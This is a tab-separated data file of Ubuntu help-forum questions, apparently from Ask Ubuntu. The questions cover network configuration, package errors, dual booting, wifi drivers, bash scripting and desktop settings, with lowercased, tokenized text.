356285	2 lan cards giving one ( wireless interface ) a static ip	due to some work i have to setup a dns server i am following a guide here http : //lani78.wordpress.com/2012/07/22/setting-up-a-dns-for-the-local-network-on-the-ubuntu-12-04-precise-pangolin-server/ my network is in range of 192.168.1.2-27 connected via an adsl router with wifi , ( i basically want to pxe boot windows using unattended ) so i am setting up all this i made following changes to the laptop which i want to make bind9 server auto lo iface lo inet static address 192.168.1.7 netmask 255.255.255.0 gateway 192.168.1.1 network 192.168.1.0 broadcast 192.168.1.255 dns-nameservers 127.0.0.1 dns-search home.lan dns-domain home.lan i have eth0 and wlan0 as interfaces on above machine so i doubt if the above changes were correct . making above entries to the interfaces file caused ssh to stop working i.e . i could not ssh to above bind9 server from other machines in my network . putting things back to following auto lo iface lo inet loopback i was able to get ssh back on target machine . now i did /etc/network/interfaces based on a template here auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 192.168.1.7 netmask 255.255.255.0 gateway 192.168.1.1 network 192.168.1.0 broadcast 192.168.1.255 dns-nameservers 127.0.0.1 dns-search home.lan dns-domain home.lan but here i was totally disconnected from the wireless , so i had to put back original settings auto lo iface lo inet loopback i notice here it says by default , networkmanager does not manage interfaces that appear in /etc/network/interfaces . if that is the case then by default where do people put in entries if they want their machines to have a static ip , in my case i have 2 network interfaces . i want to know what is wrong in my configuration and for client machines what should i set ? i have also tried setting up of static ip for wireless interfaces by a guide here the configuration looked as follows auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 192.168.1.7 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.1 wpa-ssid bsnl2 wpa-psk e61b988cf433a0275de2a0ea569417479adb1b49698f432152cc1c5a901369ce but upon reboot i found my wireless connection broken so i had to revert back to auto lo iface lo inet loopback what is the mistake i am doing ?
356290	sudo apt-get update stuck at 100 % [ waiting for headers ] ?	here is the sample hit http : //security.ubuntu.com raring-security/main translation-en hit http : //security.ubuntu.com raring-security/multiverse translation-en hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //security.ubuntu.com raring-security/universe translation-en ign http : //security.ubuntu.com raring-security/main translation-en_us ign http : //security.ubuntu.com raring-security/multiverse translation-en_us ign http : //security.ubuntu.com raring-security/restricted translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us ign http : //pk.archive.ubuntu.com raring release.gpg ign http : //pk.archive.ubuntu.com raring-updates release.gpg ign http : //pk.archive.ubuntu.com raring-backports release.gpg ign http : //pk.archive.ubuntu.com raring release ign http : //pk.archive.ubuntu.com raring-updates release ign http : //pk.archive.ubuntu.com raring-backports release 100 % [ waiting for headers ] or if i stop this and try to install any software it gives the other error ( i tried vlc and this time ) package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details the following packages have unmet dependencies : vlc-plugin-notify : depends : vlc-nox ( = 2.0.8-0ubuntu0.13.04.1 ) but 2.0.8-0ubuntu0.13.04.1 is to be installed depends : libc6 ( > = 2.8 ) but 2.17-0ubuntu5 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.28.0-0ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.12.0 ) but 2.36.0-1ubuntu2 is to be installed depends : libgtk2.0-0 ( > = 2.8.0 ) but 2.24.17-0ubuntu2 is to be installed vlc-plugin-pulse : depends : vlc-nox ( = 2.0.8-0ubuntu0.13.04.1 ) but 2.0.8-0ubuntu0.13.04.1 is to be installed depends : libc6 ( > = 2.8 ) but 2.17-0ubuntu5 is to be installed depends : libpulse0 ( > = 1:1.0 ) but 1:3.0-0ubuntu6 is to be installed please help !
356291	failed to download repository information on xubuntu 12.04 64-bit	i know this question has been asked a million times before but i have checked out the previous posts and none of the advice given in them has worked for me . i 'm getting this with the medibuntu repository . i 'm running xubuntu 12.04 so i know it 's not an eol issue . my internet connection is fine . i 'm using it at the same time i 'm doing the update . i 'm able to surf the net , etc . i have a proxy but if that was the issue would n't all the repositories and ppas be affected ? also , i 've never had issues with the proxy server doing this before . this is the first time i have run across this error . i changed servers twice to different servers . i tried to select the best server and i tried the main server i tried the following three commands all without error sudo apt-get autoclean , sudo apt-get clean , and sudo apt-get autoremove . then i tried running the update again and it still came up with the 404 error i ran sudo apt-get update | grep no_pubkey and it just came up with the same error message i do n't know what else to do at this point .
356304	after dual boot installation of 12.04 with vista , first got only ubuntu , now only windows	i never get the os choice screen . after initial problem ( booting directly into ubuntu ) i ran 'boot-repair ' , but it failed to correct the problem . under 'advanced options ' i tried different grub and mbr locations , but now i can only boot directly into windows . my latest boot-repair report is here . i looked at a number similiar problems , but they all seem unique . maybe the lack of a os choice screen is nvidia graphics problem ? if anyone is able to help out that would be greatly appreciated .
356312	wifi connected , but no internet access after update , i 've tried it all	after an update on ubuntu 12.04 lts i 've lost internet access although i can see the wifi connection . i 've tried all the solutions i could find on google and on this forum , but nothing worked . i know that a lot of people had had trouble with ath9k drivers , but i cant find a solution . i tried to find a way to reset ubuntu as when i first installed it , but there is n't . i thought there could be a solution . any ideas ?
356317	problems with drivers on a netbook	i tried two distros on a dell inspiron mini netbook 10 ( ubuntu 12.04 and linux mint 15 ) with both i had problems with the wireless and video drivers . on ubuntu i ran the update manage and the additional drivers applications , and they fixed my wireless problem but i could n't figure out the video driver . on linux mint is could n't find out how to do either . can i just go to the dell inspiron mini website and download the drivers ? how would that work ?
356320	a bash script that opens several terminals from different direcotories and operates some funtions on those terminal	maybe my question was partly answered here but i need full solution . what i want to do is this : gnome-terminal -- tab -x `` cd /ini/experiments/ gedit mytext.txt '' -- tab -e `` cd /ini/myex/ipython '' so i need to execute ipython from myex diretory and open mytext.txt from experiments directory . since i have several such jobs every time , it is headache to do . i tried this as well : gnome-terminal -- tab -- working-directory= '' /ini/experiments/ gedit mytext.txt '' but this does not work , it gets to home directory again . many thanks
356321	apt-get upgrade overwrites build configurations	i installed graphicsmagick with some modified configurations , different from those of the repository package , and then i ran apt-get upgrade , just to see that the changes i made were reset to defaults . is that how it goes ? and if so , how can i tell it to not overwrite my configs ? edit : i rebuilt the package with debuild and then installed with dpkg -i , in case that matters .
356324	decrease default sizes on external monitor	i have a system 76 galago ultra pro , and 90 % of the time it lives on my desk connected to an external monitor . my problem is that the system thinks that my external monitor is much smaller than it is , so it makes everything ( fonts , icons , etc ) on that screen too big . here 's a screen shot of what the system thinks my monitors look like : and here 's a photo of the actual set up : look at the size of that terminal window on the external ! it 's unpleasant to use . it looks to me like the system recognises the correct resolution of the external , and can tell that it 's significantly smaller than that of the laptop ( the external is a few years old ) , but i 'd really like to tell it that the actual size of the monitor is larger . is there a way to do that ?
356328	wine on my hp pavilion dm 1	so i have a hp pavilion dm 1 , i have downloaded wine and it works well . then i followed a tutorial on the league of legends website for downloading lol on ubuntu and i got all the way up to opening wine and starting the game but when i go to open wine it opens and stays on a white blank page that does not load and i cant exit out of it either . wine has done that before . the tutorial had me go through the terminal and also install another wine to run lol on and add ppa to my software . if that helps any . is it my computer ? or should i just re install ubuntu ? thanks and i hope that makes sense .
356329	is it possible to have 2 os in the same pc ?	i am currently using windows 7 ultimate and am interested in ubuntu os . my pc has the following specifications : 1 tb harddisk 4 gb ram 1 gb graphics card amd athalon 3 processor 64 bit which version of ubuntu is ok for me ? where can i get it from ? i am an indian resident .
356334	some bash questions for a newbie	i am studying bash , but there are some things that are not explained in my book . first i 'll post a script , and then i will ask questions going through scripts . bash script : $ cat sortmerg # ! /bin/bash usage ( ) { if [ $ # -ne 2 ] ; then echo `` usage : $ 0 file1 file2 '' 2 > & 1 exit 1 fi } # default temporary directory : $ { tempdir : =/tmp } # check argument count usage `` $ @ '' # set up temporary files for sorting file1= $ tempdir/ $ $ .file1 file2= $ tempdir/ $ $ .file2 # sort sort $ 1 > $ file1 sort $ 2 > $ file2 # open $ file1 and $ file2 for reading . use file descriptors 3 and 4. exec 3 < $ file1 exec 4 < $ file2 # read the first line from each file to figure out how to start . read line1 < & 3 status1= $ ? read line2 < & 4 status2= $ ? # strategy : while there is still input left in both files : # output the line that should come first . # read a new line from the file that line came from . while [ $ status1 -eq 0 -a $ status2 -eq 0 ] do if [ [ `` $ line2 '' > `` $ line1 '' ] ] ; then echo -e `` 1.\t $ line1 '' read -u3 line1 status1= $ ? else echo -e `` 2.\t $ line2 '' read -u4 line2 status2= $ ? fi done # now one of the files is at end-of-file . # read from each file until the end . # first file1 : while [ $ status1 -eq 0 ] do echo -e `` 1.\t $ line1 '' read line1 < & 3 status1= $ ? done # next file2 : while [ [ $ status2 -eq 0 ] ] do echo -e `` 2.\t $ line2 '' read line2 < & 4 status2= $ ? done # close and remove both input files exec 3 < & - 4 < & - rm -f $ file1 $ file2 exit 0 questions : first of all , how do i indent codes in gedit ? i copied and pasted codes from a book , and it does n't indent the codes automatically . do you normally use gedit or any other editor popular for scripting bash ? : $ { tempdir : =/tmp } can you explain what this is ? i have programming knowledge of c # and other programming languages . so can you tell me , assuming i 'm not total newbie at programming , what the : key and the curly bracket keys do ? if [ [ `` $ line2 '' > `` $ line1 '' ] ] ; then [ ] is same as test . but why does [ [ ] ] do any different ? status1= $ ? what is $ ? ? many thanks in advance .
356337	is it possible to install ubuntu on my imac osx 10.8.5 ?	it 's possible to install ubuntu on my imac osx 10.8.5 ... . do you guys have any tutorial on because i am a dummy ... or somewhere where i can learn .
356343	how to launch a terminal from script and another script to run in terminal	i run a script when i log in that basically looks like this : chromium-browser & xchat & cd ~/randomdir & & gnome-terminal & qbittorrent & on the third line ( cd ~/randomdir & & gnome-terminal & ) , i would like to run another script in the terminal that i 'm opening up . how can i do that in this script ?
356344	terraria ubuntu problems	im trying to run terraria on steam and i dont know how . ps : im stupid when it comes to these things thanks !
356348	ubuntu disk does not boot in uefi mode	the notebook ( aspire v3 windows 8 ) does n't even start in uefi mode . dvd drive is on top of the boot list . but secure boot is deactivated . what could be the reason ? i 'm sorry that i did not explain the problem in more detail . i 'll try to explain more precisely : usually the logo of acer is displayed briefly and windows loads shortly after that . when i start with the disk , the logo is displayed and the drive comes indeed to life , but then nothing happens . it just shows the logo .
356349	starting wine related services at startup	to decrease launch time of wine apps i am of the view that wine related services be started at boot ... if i recall correctly wineserver.exe explorer.exe plugnplay.exe are some of the services , so how do i initiate them at startup ? and whether this will cause required effect ?
356353	hdmi to audio converter not being detected	the audio jack in a laptop i have broke so i bought an hdmi to audio converter . it 's being detected in windows just fine but not on ubuntu . i believe i 'm running 12.04 . this is the specific converter : 1080p hdmi male input to vga +audio output cable converter adapter for hdtv pc you can find it on amazon . note that i 'm not using the vga part in any way . just the hdmi to audio . any ideas what 's wrong here ?
356356	ca n't find correct ast ( aspeed ) video driver to match the abi version of x	i am running ubuntu server 12 on a oracle x4140 server with built in video . i ca n't get the desktop to start . here is the top of the log file ... x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic x86_64 ubuntu current operating system : linux codenom-balt 3.8.0-31-generic here is the error ... current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : thu oct 10 12:12:44 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) module abi major version ( 10 ) does n't match the server 's version ( 11 ) ( ee ) module abi major version ( 10 ) does n't match the server 's version ( 11 ) vesa : ignoring device with a bound kernel driver vesa : ignoring device with a bound kernel driver fatal server error : addscreen/screeninit failed for driver 0 i can find newer versions of the ast driver like version 12 , 13 and 14 but for some reason ca n't locate 11 . should i upgrade the x server ? i have run apt-get update and apt-get dist-upgrade so i thought i would have the latest stuff . any suggestions ?
356357	how to use alt+shift to switch keyboard layouts ?	i recently upgraded to ubuntu 13.10 , with the new keyboard handling system . the little `` switch keyboard '' option does not let me set it to alt+shift . how can i get this keyboard binding , as i have absolutely no interest in using the mac-esque super+space combo ?
356360	whenever i try to execute `sudo dd if=/path/to/ubuntu.img of=/dev/rdisk1 bs=1m` it shows an error	it then ends up showing this : password : dd : /path/to/ubuntu.img : no such file or directory yet , i named my file ubuntu.img it is already a dmg the full name of the dmg on my desktop is `` ubuntu.img.dmg ''
356361	which iso image do i use for 64-bit freescale power pc ?	i have a desktop with a 64-bit freescale power pc . do i sue the iso image for amd64 processor or the 64-bit image for mac ?
356363	do not have choice to boot lubuntu , go straight to xp	i have a toshiba m55 with windows xp installed . i partitions a drive f : using easeus first . and installed lubuntu 12 with a iso image disk . during installation i choose f : as the location to install , and also choose 'something else ' because i did not have the choice 'along side windows ' . when i reboot , it goes straight to xp without any choice as i have on my other machines . could someone please tell me why and how to fix this ?
356365	wifi connects to network but not connects to internet	i use ubuntu 10.4 it connects to a my wifi router but it not make ping or surf the internet its a belkin n150 i installed the realtek drivers ok also doesn´t ping the router in firefox it says resolving.. google.es pruebas @ pruebas-desktop : ~ $ ifconfig eth0 link encap : ethernet direcciónhw 00:15 : f2:79:39 : a8 activo difusión multicast mtu:1500 métrica:1 paquetes rx:0 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : bucle local direc . inet:127.0.0.1 másc:255.0.0.0 dirección inet6 : : :1/128 alcance : anfitrión activo bucle funcionando mtu:16436 métrica:1 paquetes rx:12 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:12 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:0 bytes rx:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) wlan0 link encap : ethernet direcciónhw ec:1a:59:10:81:37 direc . inet:192.168.1.77 difus . :192.168.1.255 másc:255.255.255.0 dirección inet6 : fe80 : :ee1a:59ff : fe10:8137/64 alcance : enlace activo difusión funcionando multicast mtu:1500 métrica:1 paquetes rx:37 errores:0 perdidos:51 overruns:0 frame:0 paquetes tx:71 errores:0 perdidos:1 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:4709 ( 4.7 kb ) tx bytes:9953 ( 9.9 kb ) ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.1.77 icmp_seq=1 destination host unreachable from 192.168.1.77 icmp_seq=2 destination host unreachable from 192.168.1.77 icmp_seq=5 destination host unreachable from 192.168.1.77 icmp_seq=19 destination host unreachable from 192.168.1.77 icmp_seq=20 destination host unreachable from 192.168.1.77 icmp_seq=21 destination host unreachable from 192.168.1.77 icmp_seq=22 destination host unreachable from 192.168.1.77 icmp_seq=25 destination host unreachable ip route show 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.77 metric 2 169.254.0.0/16 dev wlan0 scope link metric 1000 default via 192.168.1.1 dev wlan0 proto static regards
356370	disconnecting wlan on lenovo b570e/ubuntu 12.04	i 've annoying problem with wi-fi connection on lenovo b570e with `` 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) '' card . it works on ubuntu 12.04 lts . connection is unstable , it disconnects sometimes after few minutes . it seems , that it 's a matter of loosing the wi-fi range . if someone has a solution for this case please help ... i 'm fighting with this problem since 3 days and i 'm frustrated ... : (
356371	gimp terminal install problem	zarjazc @ pl998794-vpcel22fx : ~ $ apt-get install gimp e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? zarjazc @ pl998794-vpcel22fx : ~ $ that 's what i get when i try to install gimp 2.8 from the website using the terminal code . the software center only has the 2.6 version
356372	remounting as read/write -- will i lose my data ?	i need root access to install a file , but i seem to have forgotten my pw . to change it , it appears i will need to enter grub and remount / as read/write as suggested here . i just want to know if i will need to back up my computer before doing this .
356382	install , blank screen just mouse , ( screen sometimes yellow , somtimes ubuntu brown , sometimes gray )	when i click try screen goes black with only mouse . ctrl-alt-del just changes screen from black to brown , still blank and only mouse works . tried installing now all i get is white screen , no boot up stuff ans a text insert cursor . wtyf ? ! can someone help me here , this is driving me nuts please note - this is not sometimes , it is always . since installation it has n't worked once . ( across several installation attempts )
356385	does nexus 4 support desktop convergence ?	i want to install ubuntu touch on my nexus 4 . but , i do n't know whether the device support desktop convergence . what i heard is we can not connect keyboard and mouse to nexus 4 via usb . if desktop convergence is possible with nexus 4 , how it can be achieved ? thanks ...
356388	error : invalid arch independent elf magic after boot-rescue	had a remote system 12.04 server go down after a power issue , attempted using boot-rescue and followed the recomendations , they seemed to make sense . upon reboot the grub rescue prompt appears after error : invalid arch independent elf magic i 'm asking this before i make matters worse as the system is not at my finger tips . here 's the bootinfo log from boot-rescue http : //paste.ubuntu.com/6218908/ any suggestions would be welcome and appreciated . regards , mal
356389	unmanaged network for second user	i use ubuntu 13.04 on a dell studio xps laptop and we usually have two users logged on . when not using the computer we close the lid , which puts it to sleep . if user one , the one first logged on , available via ctrl+altf7 wakes the computer by unlocking the account , the network is immediately available . but if user two does the same thing , that user have to wait around 45 second until the network becomes available . this is very annoying . the problem is not connected to one user account , but moves depending on the order we log on . while waiting on the network , the wifi and the wired network shows as unmanaged .
356390	ubuntu touch on galaxy tab 3 p5210	sorry for my english i was thinking in buy a samsung galaxy tab 3 p5210 in christmast but before i want to know if i could install ubuntu touch i wathed that is available for galaxy tab 2 http : //www.youtube.com/watch ? v=kqh2rlegnje and http : //forum.xda-developers.com/showthread.php ? p=40846174please but i dont found noting about samsung galaxy tab 3
356391	rtl8187l chipset with disconnects and slow speed . please help me	hi i just installed ubuntu 12.04 lts i 'm experiencing a few problems with the card . when im using it for internet purposes its very slow and when i try to download a file from the internet , the connection eventually drops and i can not seem to reconnect to the wifi network . please help me
356392	loud fan : tried many ways , but ca n't handle it	hope you can help me , quite frustrating ... i used windows 7 and had no problems with my fans at all . using linux in the university i decided to use it at home , too . when you boot your computer , your fan starts to get loud , but then gets nearly silent . this does not happen , it keeps being loud . i am quite sure the cpu-fan is my problem . settings in the boot-menu did not help in any way ; they had no influence on my fan . hardware : intel i5-3570 lga 1155 msi z77a-g43 i have already searched a lot and tried to use fancontrol . but , as you probably know , you need to install lm-sensors first and configure pwmconfig . summary-output of sensors-detect : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) driver `lm78 ' : * isa bus , address 0x290 chip `national semiconductor lm78 ' ( confidence : 6 ) driver `f71882fg ' : * isa bus , address 0x295 chip `fintek f71869a super io sensors ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : -- -- cut here -- -- chip drivers coretemp f71882fg lm78 -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) yes successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service kmod start ' to load them . unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok output of sensors : acpitz-virtual-0 adapter : virtual device temp1 : +27.8°c ( crit = +106.0°c ) temp2 : +29.8°c ( crit = +106.0°c ) nouveau-pci-0100 adapter : pci adapter fan1 : 4824 rpm temp1 : +42.0°c ( high = +95.0°c , hyst = +3.0°c ) ( crit = +105.0°c , hyst = +5.0°c ) ( emerg = +135.0°c , hyst = +2.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +36.0°c ( high = +85.0°c , crit = +105.0°c ) core 0 : +28.0°c ( high = +85.0°c , crit = +105.0°c ) core 1 : +36.0°c ( high = +85.0°c , crit = +105.0°c ) core 2 : +28.0°c ( high = +85.0°c , crit = +105.0°c ) core 3 : +32.0°c ( high = +85.0°c , crit = +105.0°c ) pkg-temp-0-virtual-0 adapter : virtual device temp1 : +35.0°c now the reason , why i wrote `` but '' ... . after i installed fancontrol , i did this sudo pwmconfig . output pwmconfig : found the following devices : hwmon0 is acpitz hwmon1 is nouveau hwmon2/device is coretemp hwmon3 is pkg-temp-0 found the following pwm controls : hwmon1/pwm1 current value : 100 giving the fans some time to reach full speed ... found the following fan sensors : hwmon1/fan1_input current speed : 4483 rpm warning ! ! ! this program will stop your fans , one at a time , for approximately 5 seconds each ! ! ! this may cause your processor temperature to rise ! ! ! if you do not want to do this hit control-c now ! ! ! hit return to continue : testing pwm control hwmon1/pwm1 ... /usr/sbin/pwmconfig : line 226 : echo : write error : operation not permitted manual control mode not supported , skipping . testing is complete . please verify that all fans have returned to their normal speed . the fancontrol script can automatically respond to temperature changes of your system by changing fanspeeds . do you want to set up its configuration file now ( y ) ? y what should be the path to your fancontrol config file ( /etc/fancontrol ) ? select fan output to configure , or other action : 1 ) change interval 3 ) save and quit 2 ) just quit 4 ) show configuration select ( 1-n ) : the last menu , showing 1 ) , 2 ) , ... should show any fan , but , as you see , it does not . additional information about that : it says `` warning ! ! ! this program will stop your fans , one at a time , for approximately 5 seconds each ! ! ! `` , but the fan did n't stop after pressing `` enter '' . do you have any idea , how i get control of my noisy problem ?
356393	how to install ubuntu by replacing windows but without formatting other partitions	i 'm using windows 7 on my pc ( 1 gb ram,160 gb hdd ) . i want to install ubuntu and remove windows 7 i have partitioned my pc into 2 drives , c drive - 40 gb and d drive - 120 gb . i want to install ubuntu on c drive without formatting d drive so how can i do that ? i know that i will have to select `` something else '' option when installation type screen appears but i do n't know how to install ubuntu in c drive after clicking on `` something else button '' .my question looks kinda similar to this question but its not
356398	how to configure linphone	how to configure in manage sip accounts in linphone . when using ubuntu . since i can not see the preferences button on the linphone . help me about this matter .
356400	i am new and need help with internet connection cord	i am new to ubuntu and i am trying to install it on an old laptop i have.i first was booting from a usb and it would recognize my ethernet cord was plugged in . then i installed to hard drive and now ubuntu will not recognize that there is a connection . any help ?
356401	how to update hp probook 4520s bios in ubuntu ?	i have recently installed ubuntu 12.0 on my laptop . this was done due to infected bios while i was using windows 7 ultimate . it got currupted and i had to remove/replace it by ubuntu . now i want to flash/update bios . how can i update bios hp probook 4520s in ubuntu environment ?
356409	need to force specific resolution at boot	got a ubuntu 13.04 server set up . now i need to add a gui so i can occasionally , at will ( not every time ) load a web browser to control a device . problem is , it 's in a rack in a lights-out server room and i must use a kvm-over-lan device ( raritan command center ) to control it . would strongly like to avoid the reinstall of the server , just want to add lxde or xfce ( do n't want overhead of gnome or kde ) and a browser ( ff or chromium ) . tried it once , lxde came up in 1368-by-somethingoroher mode . could not see the panel or launch any app because i could not scroll around in the raritan to see that part of the screen , hadda do ctrl-shift-f1 to get to tty1 and uninstall the lxde so i could get my server back . so , here 's the questions . 1 ) if i add a gui in 13.04 , can i call for it only when i want it , for lxde came back up even if i rebooted . i want cli all the time out of boot and gui just on demand . 2 ) how can i make that gui launch in 800x600 every time without fail , avoiding the higher-res modes which keep me from using it ? thank you kindly , all .
356413	vim = does n't format codes very well	i used gg=g to format badly formatted codes , but it does n't work well . it does n't align codes inside bracket and it just do first several lines of codes only . for example , the below codes 1 is formatted as 2 using gg=g . am i going wrong ? 1. codes before formatted ============================================ # strategy : while there is still input left in both files : # output the line that should come first . # read a new line from the file that line came from . while [ $ status1 -eq 0 -a $ status2 -eq 0 ] do if [ [ `` $ line2 '' > `` $ line1 '' ] ] ; then echo -e `` 1.\t $ line1 '' read -u3 line1 status1= $ ? else echo -e `` 2.\t $ line2 '' read -u4 line2 status2= $ ? fi done # now one of the files is at end-of-file . # read from each file until the end . # first file1 : while [ $ status1 -eq 0 ] do echo -e `` 1.\t $ line1 '' read line1 < & 3 status1= $ ? done # next file2 : while [ [ $ status2 -eq 0 ] ] do echo -e `` 2.\t $ line2 '' read line2 < & 4 status2= $ ? done # close and remove both input files exec 3 < & - 4 < & - rm -f $ file1 $ file2 exit 0 ======================================================================== 2. formatted codes with gg=g # ! /bin/bash usage ( ) { if [ $ # -ne 2 ] ; then echo `` usage : $ 0 file1 file2 '' 2 > & 1 exit 1 fi } # default temporary directory : $ { tempdir : =/tmp } # check argument count usage `` $ @ '' # set up temporary files for sorting file1= $ tempdir/ $ $ .file1 file2= $ tempdir/ $ $ .file2 # sort sort $ 1 > $ file1 sort $ 2 > $ file2 # open $ file1 and $ file2 for reading . use file descriptors 3 and 4. exec 3 < $ file1 exec 4 < $ file2 # read the first line from each file to figure out how to start . read line1 < & 3 status1= $ ? read line2 < & 4 status2= $ ? # strategy : while there is still input left in both files : # output the line that should come first . # read a new line from the file that line came from . while [ $ status1 -eq 0 -a $ status2 -eq 0 ] do if [ [ `` $ line2 '' > `` $ line1 '' ] ] ; then echo -e `` 1.\t $ line1 '' read -u3 line1 status1= $ ? else echo -e `` 2.\t $ line2 '' read -u4 line2 status2= $ ? fi done # now one of the files is at end-of-file . # read from each file until the end . # first file1 : while [ $ status1 -eq 0 ] do echo -e `` 1.\t $ line1 '' read line1 < & 3 status1= $ ? done # next file2 : while [ [ $ status2 -eq 0 ] ] do echo -e `` 2.\t $ line2 '' read line2 < & 4 status2= $ ? done # close and remove both input files exec 3 < & - 4 < & - rm -f $ file1 $ file2 exit 0
356414	how to use gnome/ubuntu media key binding in other window environments ?	i had an older laptop with ubuntu 13.04 ( upgraded a few times ) where i 've installed xmonad . in xmonad i would get all the media keys bindings from ubuntu ( including osd notifications ) . i 'm not sure what it was , but perhaps it was gnome-settings-daemon that was taking care of it because there are entries in dconf for that . in my new laptop i installed xfce through a minimal iso , then compiled xmonad . i tried to keep the same environment -- gnome-settings-daemon is run in .xinitrc as before and gsettings contains the same bindings . however , the key bindings do not work . what am i missing ? i guess i could try to install the whole ubuntu-desktop but i have a small ssd so i 'd like to avoid that . i know xmonad can define its own custom handlers , but i 'm having trouble with defining volume control actions and i figured it would be easier to just use what 's out there already . tl ; dr what executables/packages/config entries are necessary to get ubuntu/gnome keybindings work in another window manager ? can i get them to work without pulling in the whole ubuntu-desktop ? i am running gnome-settings-daemon + the media-keys plugin is active in dconf , but the keys are not handled .
356417	integration multiple internet connections ispunity vs ubuntu bonding	i have ubuntu 13.04 with 2 ethernet cards and a wifi card . i also have 3 isp connections . i have to configure linux to use all 3 connections . my main concern is to increase outgoing bandwidth ( ftp traffic ) for ubuntu . i found 2 possible solutions : ubuntu bonding bonding , also called port trunking or link aggregation means combining several network interfaces ( nics ) to a single link , providing either high-availability , load-balancing , maximum throughput , or a combination of these . see wikipedia for details . ubuntubonding ispunity open source framework , built to integrate ( load balance & failover ) multiple internet connections simultaneously . the project was started on 14th february 2012 by arun tomar , and has been since extended by team of collaborators . article about ispunity if you did integration of multiple internet connections can you please give recommendation which method is preferred or answer any of the following questions : how good it works ? are you satisfied by result ? which particular method you selected and why ? any possible disadvantages which you see in the proposed solutions . if you can tell pros and cons of every solution it will be fantastic ! thank you in advance update after googling for hours i found very usefull article how to configure system to use 2 or 3 connections without link bonding . as temporary solution it works for me , but the main question is still very important .
356419	how to install a newer version of the gtk libraries ?	i want to install a newer version of the gtk libraries so i can mess around with the new gtkheaderbar ( i want to try to make applications ) . i have xubuntu 13.04 and currently have version 3.6 of those libraries . how do i update to a higher version ? i have tried the gnome-next ppa but when i try to upgrade with it , synaptic says i have to remove a lot of packages , xubuntu-desktop included ... i have tried the deb 's from here as well ( 3.8 instead of 3.10 , alas ) , but those did n't install because the one deb needed the other so could n't install , but that other deb needed the first deb too so ca n't install too , making it impossible to install them . i have tried the packages from http : //www.gtk.org/download too . it compiles and installs without errors , but when done with installing , it is n't installed ... it does mess up the appearance of many gtk application though until make uninstall'ed . how do i upgrade the gtk libraries ?
356422	all lines are dotted !	when using gimp , and i select a pencil or a brush , all my lines are dotted ! how do i fix this ?
356423	how to enable root password in ubuntu 12.04	whenever i use the sudo su command to work as root , it does not ask my root password . how can i make it prompt for root password ?
356425	how to configure ubuntu unity to have fixed workspace for external monitor	i am using unity ( ubuntu 13.04 ) . is there any way to make one of the workspace stay fixed for external monitor . for example , i am in the middle of the presentation and i just want to quickly switch to another workspace , do somethings and come back to this workspace . this way , my audience , will not notice any interruptions ( this is when they are taking notes , and i want to browse my emails ) . i have seen my professor doing this on his mac but i do not know how to do that on ubuntu .
356426	brightness function keys not working in 12.04.3 lts ?	i 'm running ubuntu 12.04.3 lts ( info from cat /etc/issue/ ) on an asus x401a kernel is : 3.8.0-31-generic i 've tried changing the /etc/default/grub file with the following : grub_cmdline_linux= '' acpi_backlight=vendor and grub_cmdline_linux '' acpi_osi=linux with no luck . any other ideas ? i really want it fixing . thank you in advance .
356427	install screen is unreadable	while installing ubuntu 12.04.3 lts on a dell optiplex gx270 i get a very coarse moire-like screen display that i can not read . i 'm using an invidia geforce fx 5200 dual monitor video card . how to avoid or fix this problem ?
356432	is there a way to skip boot menu and go straight to windows but go to ubuntu whenever i want ?	now , i understand my question needs explanation . i do n't know the linux lingo quite yet . what i am asking is : is there a way to skip the screen asking whether i want to load windows or ubuntu , and load windows every time . i also want the option to be able to load into ubuntu on startup if i so choose . but , otherwise i want to load windows every time without being stopped by the screen asking which os i want .
356437	help connecting to my schools wireless network	my school´s hates everybody that dosen´t run windows 7/8 . therefor , they will not give me support in connecting to my school´s wifi , which i need badly . i have a guide for windows 7 and i hope that someone can `` translate '' into a ubuntu 13.04 guide , since my attemps haven´t worked . i sincerely hope that somebody will help ! windows 7 open network and sharing center manage wireless networks add manually create a network profile name : unv security type : wpa2-enterprise encryption type : aes security key : leave blank click next change connection settings security settings for `` network authentication method ( it is set to microsoft : protected eap ( peap ) '' check off “validate server certificate” configure under “authentication method” ( secured password ( eap-mschap v2 ) ) check off `` automaticly use my windows logon name and password ( and domain if any ) ''
